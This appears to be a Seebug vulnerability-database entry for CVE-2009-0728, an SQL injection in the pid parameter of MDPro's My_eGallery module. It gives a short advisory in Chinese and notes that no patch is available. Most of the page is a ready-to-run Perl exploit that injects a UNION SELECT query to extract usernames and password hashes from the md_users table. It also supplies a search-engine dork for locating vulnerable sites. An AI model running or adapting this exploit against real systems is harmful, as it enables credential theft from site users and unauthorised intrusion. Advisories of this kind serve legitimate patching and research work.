Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
seebugRootSSV:4830
HistoryFeb 26, 2009 - 12:00 a.m.

MDPro My_eGallery模块pid参数SQL注入漏洞

2009-02-2600:00:00
Root
www.seebug.org
138

EPSS

0.001

Percentile

30.1%

JSON

BUGTRAQ ID: 33871
CVE(CAN) ID: CVE-2009-0728

MDPro是一款开放源码的内容管理系统。

MDPro的index.php文件没有正确地过滤对pid参数的输入参数,如果module设置为My_eGallery且do设置为showpic,远程攻击者就可以通过提交恶意请求执行SQL注入攻击。

MAXdev My_eGallery 3.1.1g
厂商补丁:

MAXdev

目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

<a href=“http://www.maxdev.com/mod-Areafiles-display-lid-180-cid-25.phtml” target=“_blank”>http://www.maxdev.com/mod-Areafiles-display-lid-180-cid-25.phtml</a>


                                                #!/usr/bin/perl

&lt;&lt;read;

    MDPro Module My_eGallery Remote SQL Injection Exploit
    by s3rg3770 &amp;&amp; yeat - staker[at]hotmail[dot]it
    
    dork: inurl:module=My_eGallery pid
    note: works regardless of php.ini settings.
    
read

use IO::Socket;


my ($host,$path,$id) = @ARGV;


if (@ARGV != 3) 
{
       print &quot;\n+-------------------------------------------------------+\n&quot;.
             &quot;\r| MDPro Module My_eGallery Remote SQL Injection Exploit |\n&quot;.
             &quot;\r+-------------------------------------------------------+\n&quot;.
             &quot;\rby yeat - staker[at]hotmail[dot]it\n&quot;.
             &quot;\nUsage: perl $0 host /path/ id\n&quot;.
             &quot;\nhost: localhost\n&quot;.
             &quot;\rpath: /mdpro/\n&quot;.
             &quot;\rid: 2\n&quot;;
       exit;
}         
else
{      
       my ($packet,$inject,$content);
       
       $inject = &quot;index.php?module=My_eGallery&amp;do=showpic&amp;pid=-1&quot;.
                 &quot;/**/AND/**/1=2/**/UNION/**/ALL/**/SELECT/**/0&quot;.
                 &quot;,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,concat(0x3C7&quot;.
                 &quot;230783E,pn_uname,0x3a,pn_pass,0x3C7230783E),0&quot;.
                 &quot;,0,0/**/FROM/**/md_users/**/WHERE/**/pn_uid=$id/*&quot;; 
                 
       $socket = new IO::Socket::INET(
                                       PeerAddr =&gt; $host,
                                       PeerPort =&gt; 80,
                                       Proto    =&gt; 'tcp'
                                     ) or die $!;
                                        
       
       $packet .= &quot;GET /$inject HTTP/1.1\r\n&quot;;
       $packet .= &quot;Host: $host\r\n&quot;;
       $packet .= &quot;User-Agent: Lynx (textmode)\r\n&quot;;
       $packet .= &quot;Connection: close\r\n\r\n&quot;;
       
       $socket-&gt;send($packet);
       
       while (&lt;$socket&gt;) {
          $content .= $_;
       }
       
       close($socket);
       
       if ($content =~ /&lt;r0x&gt;(.+?)&lt;r0x&gt;/i) {
          print &quot;Exploit Successful: $1\n&quot;;
       }
       else {
          print &quot;Exploit Failed.\n&quot;;
       }      
}

Related

cve 1
exploitdb 1
nvd 1
prion 1
cvelist 1
cve
cve
CVE-2009-0728
2009-02-24 23:30:03
exploitdb
exploitdb
MDPro Module My_eGallery - &#039;pid&#039; SQL Injection
2009-02-23 00:00:00
nvd
nvd
CVE-2009-0728
2009-02-24 23:30:03
prion
prion
Sql injection
2009-02-24 23:30:00
cvelist
cvelist
CVE-2009-0728
2009-02-24 23:00:00

EPSS

0.001

Percentile

30.1%

JSON
Related for SSV:4830
cve1exploitdb1nvd1prion1cvelist1